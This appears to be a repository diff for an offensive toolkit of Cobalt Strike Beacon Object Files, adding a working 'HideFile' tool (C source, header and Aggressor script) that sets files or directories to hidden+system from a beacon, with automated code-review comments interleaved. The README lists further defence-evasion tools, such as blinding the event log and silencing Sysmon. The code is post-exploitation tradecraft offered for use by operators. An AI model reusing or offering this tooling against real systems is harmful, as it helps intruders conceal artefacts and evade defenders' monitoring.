@@ -0,0 +1,86 @@
+#include <windows.h>
+#include <stdio.h>
+#include "hidefile.h"
+#include "beacon.h"
+
+
+BOOL CreateHiddenDir(WCHAR *directory) {
+	DWORD attrib;
+	attrib = KERNEL32$GetFileAttributesW(directory);
+	if(attrib == INVALID_FILE_ATTRIBUTES) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to get file attribute information from directory with error code: %ld. Is the path and directory name correct?\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+	attrib |= FILE_ATTRIBUTE_HIDDEN;
+	attrib |= FILE_ATTRIBUTE_SYSTEM;
+
+	if(KERNEL32$SetFileAttributesW(directory, attrib) == 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to set new attribute information on the directory with error code: %ld\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+	return TRUE;
+}
+
+
+BOOL CreateHiddenFile(WCHAR *file) {
+	HANDLE hFile;
+	FILE_BASIC_INFORMATION fileInfo;
+	IO_STATUS_BLOCK ioStatusBlock;
+	
+
+	NtQueryInformationFile_t pNtQueryInformationFile = (NtQueryInformationFile_t)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationFile");
+	if(pNtQueryInformationFile == NULL) return 0;
+
+    NtSetInformationFile_t pNtSetInformationFile = (NtSetInformationFile_t)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationFile");
+	if(pNtSetInformationFile == NULL) return 0;
+
+
+	hFile = KERNEL32$CreateFileW(file, GENERIC_READ | GENERIC_WRITE | FILE_WRITE_ATTRIBUTES, 0, NULL, OPEN_EXISTING, 0, NULL);
+	if (hFile == INVALID_HANDLE_VALUE) {
+		BeaconPrintf(CALLBACK_ERROR, "Could not open file with error code: %ld\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+
+	if (pNtQueryInformationFile(hFile, &ioStatusBlock, &fileInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation) < 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to get file attribute information with error code: %ld\n", KERNEL32$GetLastError());
+		KERNEL32$CloseHandle(hFile);
+		return FALSE;
+	}
+	
+	fileInfo.FileAttributes |= FILE_ATTRIBUTE_HIDDEN;
+	fileInfo.FileAttributes |= FILE_ATTRIBUTE_SYSTEM;
+	
+
+	if (pNtSetInformationFile(hFile, &ioStatusBlock, &fileInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation) < 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to set new attribute information on the file with error code: %ld\n", KERNEL32$GetLastError());
+		KERNEL32$CloseHandle(hFile);
+		return FALSE;
+	}
+
+	KERNEL32$CloseHandle(hFile);
+	return TRUE;
+}
+
+
+int go(char *args, int len) {
+	CHAR *option;
+	WCHAR *path;
+	BOOL res = FALSE;
+	datap parser;
+	
+	BeaconDataParse(&parser, args, len);
+	option = BeaconDataExtract(&parser, NULL);
+	path = BeaconDataExtract(&parser, NULL);
+	
+	if (MSVCRT$strcmp(option, "dir") == 0) {
+		res = CreateHiddenDir(path);
+		if (res) BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully modified directory attributes to systemfile + hidden.\n");
+	}
+	else if (MSVCRT$strcmp(option, "file") == 0) {
+		res = CreateHiddenFile(path);
+		if (res) BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully modified file attributes to systemfile + hidden.\n");
+	}
+	else BeaconPrintf(CALLBACK_ERROR, "Please specify one of the following options: dir | file\n");
+
+	return 0;
+}
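Review bot: `CreateHiddenDir` in hidefile.c does not create anything — it reads the attributes with `KERNEL32$GetFileAttributesW` and ORs in HIDDEN and SYSTEM — so the name misleads, especially since the function of the same name in KIT/DllEnvHijacking/dllenvhijacking.c does call `CreateDirectoryW` first. Rename it (e.g. `SetHiddenDirAttributes`) or add a header comment such as `/* Marks an existing directory hidden+system; does not create it. */`. In `go`, the three branches each print their own message and `res` is otherwise unused after the call, so the `BOOL res` local could be dropped in favour of `if (CreateHiddenDir(path)) ...` to shorten the dispatch.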

+ 43 - 0
KIT/HideFile/hidefile.cna

@@ -0,0 +1,43 @@
+# author REDMED-X
+
+beacon_command_register(
+	"hidefile", "Hide file or directory by setting it's attributes to systemfile + hidden.\n",
+	"INFO:\nHide a directory or file from plain sight by modifying the attributes and set them to systemfile + hidden.\n\nOPTIONS:\n[dir]: set this option if you want to modify the attributes of a directory.\n[file]: set this option if you want to modify the attributes of a file.\n[<path to dir/file>]: path to the directory or file that you want to hide.\n\n" .
+	"USAGE:\nhidefile <dir | file> <path to dir/file>\n\n");
+
+
+alias hidefile {
+    $bid = $1;
+    $option = $2;
+	$path = $3;
+
+
+	if ($option eq "") {
+		berror($bid, "Please specify one of the following options: dir | file\n");
+		return;
+	}
+	
+	if ($option eq "dir" || $option eq "file") {
+		if ($path eq "") {
+			berror($bid, "Please specify the correct path to the target directory or file.\n");
+			return;
+		}
+	}
+	else {
+		berror($bid, "This option isn't supported. Please specify one of the following options: dir | file\n");
+		return;
+	}
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("hidefile.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+	# Pack our arguments
+    $arg_data  = bof_pack($bid, "zZ", $option, $path);
+	
+	blog($bid, "Tasked to hide directory or file..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+

+ 134 - 0
KIT/HideFile/hidefile.h

@@ -0,0 +1,134 @@
+#include <windows.h>
+
+typedef struct _FILE_BASIC_INFORMATION {
+	LARGE_INTEGER CreationTime;				// absolute system, number of 100-nanosecond intervals 
+	LARGE_INTEGER LastAccessTime;			// since the start of the year 1601 in the Gregorian calendar.
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	ULONG FileAttributes;					// metadata about the file, ex.: archive, compressed, directory, hidden, etc.
+} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
+
+
+typedef enum _FILE_INFORMATION_CLASS {
+    FileDirectoryInformation                         = 1,
+    FileFullDirectoryInformation,                   // 2
+    FileBothDirectoryInformation,                   // 3
+    FileBasicInformation,                           // 4
+    FileStandardInformation,                        // 5
+    FileInternalInformation,                        // 6
+    FileEaInformation,                              // 7
+    FileAccessInformation,                          // 8
+    FileNameInformation,                            // 9
+    FileRenameInformation,                          // 10
+    FileLinkInformation,                            // 11
+    FileNamesInformation,                           // 12
+    FileDispositionInformation,                     // 13
+    FilePositionInformation,                        // 14
+    FileFullEaInformation,                          // 15
+    FileModeInformation,                            // 16
+    FileAlignmentInformation,                       // 17
+    FileAllInformation,                             // 18
+    FileAllocationInformation,                      // 19
+    FileEndOfFileInformation,                       // 20
+    FileAlternateNameInformation,                   // 21
+    FileStreamInformation,                          // 22
+    FilePipeInformation,                            // 23
+    FilePipeLocalInformation,                       // 24
+    FilePipeRemoteInformation,                      // 25
+    FileMailslotQueryInformation,                   // 26
+    FileMailslotSetInformation,                     // 27
+    FileCompressionInformation,                     // 28
+    FileObjectIdInformation,                        // 29
+    FileCompletionInformation,                      // 30
+    FileMoveClusterInformation,                     // 31
+    FileQuotaInformation,                           // 32
+    FileReparsePointInformation,                    // 33
+    FileNetworkOpenInformation,                     // 34
+    FileAttributeTagInformation,                    // 35
+    FileTrackingInformation,                        // 36
+    FileIdBothDirectoryInformation,                 // 37
+    FileIdFullDirectoryInformation,                 // 38
+    FileValidDataLengthInformation,                 // 39
+    FileShortNameInformation,                       // 40
+    FileIoCompletionNotificationInformation,        // 41
+    FileIoStatusBlockRangeInformation,              // 42
+    FileIoPriorityHintInformation,                  // 43
+    FileSfioReserveInformation,                     // 44
+    FileSfioVolumeInformation,                      // 45
+    FileHardLinkInformation,                        // 46
+    FileProcessIdsUsingFileInformation,             // 47
+    FileNormalizedNameInformation,                  // 48
+    FileNetworkPhysicalNameInformation,             // 49
+    FileIdGlobalTxDirectoryInformation,             // 50
+    FileIsRemoteDeviceInformation,                  // 51
+    FileUnusedInformation,                          // 52
+    FileNumaNodeInformation,                        // 53
+    FileStandardLinkInformation,                    // 54
+    FileRemoteProtocolInformation,                  // 55
+    FileRenameInformationBypassAccessCheck,         // 56
+    FileLinkInformationBypassAccessCheck,           // 57
+    FileVolumeNameInformation,                      // 58
+    FileIdInformation,                              // 59
+    FileIdExtdDirectoryInformation,                 // 60
+    FileReplaceCompletionInformation,               // 61
+    FileHardLinkFullIdInformation,                  // 62
+    FileIdExtdBothDirectoryInformation,             // 63
+    FileDispositionInformationEx,                   // 64
+    FileRenameInformationEx,                        // 65
+    FileRenameInformationExBypassAccessCheck,       // 66
+    FileDesiredStorageClassInformation,             // 67
+    FileStatInformation,                            // 68
+    FileMemoryPartitionInformation,                 // 69
+    FileStatLxInformation,                          // 70
+    FileCaseSensitiveInformation,                   // 71
+    FileLinkInformationEx,                          // 72
+    FileLinkInformationExBypassAccessCheck,         // 73
+    FileStorageReserveIdInformation,                // 74
+    FileCaseSensitiveInformationForceAccessCheck,   // 75
+    FileKnownFolderInformation,   					// 76
+    FileMaximumInformation
+} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
+
+
+typedef struct _IO_STATUS_BLOCK {
+  union {
+    NTSTATUS Status;
+    PVOID    Pointer;
+  };
+  ULONG_PTR Information;
+} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+
+
+typedef NTSTATUS (NTAPI *NtQueryInformationFile_t)(
+  HANDLE                 FileHandle,
+  PIO_STATUS_BLOCK       IoStatusBlock,
+  PVOID                  FileInformation,
+  ULONG                  Length,
+  FILE_INFORMATION_CLASS FileInformationClass
+);
+
+
+typedef NTSTATUS (NTAPI *NtSetInformationFile_t)(
+  HANDLE                 FileHandle,
+  PIO_STATUS_BLOCK       IoStatusBlock,
+  PVOID                  FileInformation,
+  ULONG                  Length,
+  FILE_INFORMATION_CLASS FileInformationClass
+);
+
+//CreateHiddenDir
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryW(LPCWSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFileAttributesW(LPCWSTR lpFileName);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFileAttributesW(LPCWSTR lpFileName, DWORD dwFileAttributes);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(void);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); 
+WINBASEAPI int __cdecl MSVCRT$getchar(void); 
+
+//CreateHiddenFile
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);
+
+//main
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); 
+WINBASEAPI int __cdecl MSVCRT$strcmp(const char *str1, const char *str2);
+
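Review bot: `MSVCRT$printf` is declared twice in this header, once in the `//CreateHiddenDir` group and again under `//main`; the second declaration is redundant and one of them should be dropped. `MSVCRT$getchar` alongside it looks like a leftover from a console test harness rather than something a BOF needs, but its call sites would be in hidefile.c, outside this hunk, so that is an inference to confirm. The header also has no include guard; adding `#pragma once` (or an `#ifndef HIDEFILE_H` guard) at the top would protect it against double inclusion. Finally, `IO_STATUS_BLOCK` and `FILE_INFORMATION_CLASS` appear to mirror types that `winternl.h` declares under the same names, so including that header together with this one would likely produce redefinition errors; a short comment above the typedefs such as `// NOTE: these mirror the winternl.h definitions; do not include <winternl.h> alongside this header` would save the next maintainer that surprise.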

BIN
KIT/HideFile/hidefile.o


BIN
KIT/LoadLib/loadlib.o


BIN
KIT/PSremote/psremote.o


BIN
KIT/SilenceSysmon/silencesysmon.o


+ 3 - 1
README.md

@@ -1,5 +1,5 @@
 # OperatorsKit
-This repository contains a collection of tools that integrate with Cobalt Strike through Beacon Object Files (BOFs). 
+This repository contains a collection of tools that integrate with Cobalt Strike through Beacon Object Files (BOFs).  
 
 ## Kit content
 The following tools are currently in the operators' kit: 
@@ -7,11 +7,13 @@ The following tools are currently in the operators' kit:
 |Name|Decription|
 |----|----------|
 |**[BlindEventlog](KIT/BlindEventlog)**|Blind Eventlog by suspending its threads.|
+|**[DllEnvHijacking](KIT/DllEnvHijacking)**|BOF implementation of DLL environment hijacking published by [Wietze](https://www.wietzebeukema.nl/blog/save-the-environment-variables) |
 |**[FindDotnet](KIT/FindDotnet)**|Find processes that most likely have .NET loaded.|
 |**[FindHandle](KIT/FindHandle)**|Find "process" and "thread" handle types between processes.|
 |**[FindLib](KIT/FindLib)**|Find loaded module(s) in remote process(es).|
 |**[FindRWX](KIT/FindRWX)**|Find RWX memory regions in a target process.|
 |**[FindSysmon](KIT/FindSysmon)**|Verify if Sysmon is running through enumerating Minifilter drivers and checking the registry.|
+|**[HideFile](KIT/HideFile)**|Hide file or directory by setting it's attributes to systemfile + hidden.|
 |**[LoadLib](KIT/LoadLib)**|Load a on disk present DLL via RtlRemoteCall API in a remote process.|
 |**[PSremote](KIT/PSremote)**|List all running processes on a remote host.|
 |**[SilenceSysmon](KIT/SilenceSysmon)**|Silence the Sysmon service by patching its capability to write ETW events to the log.|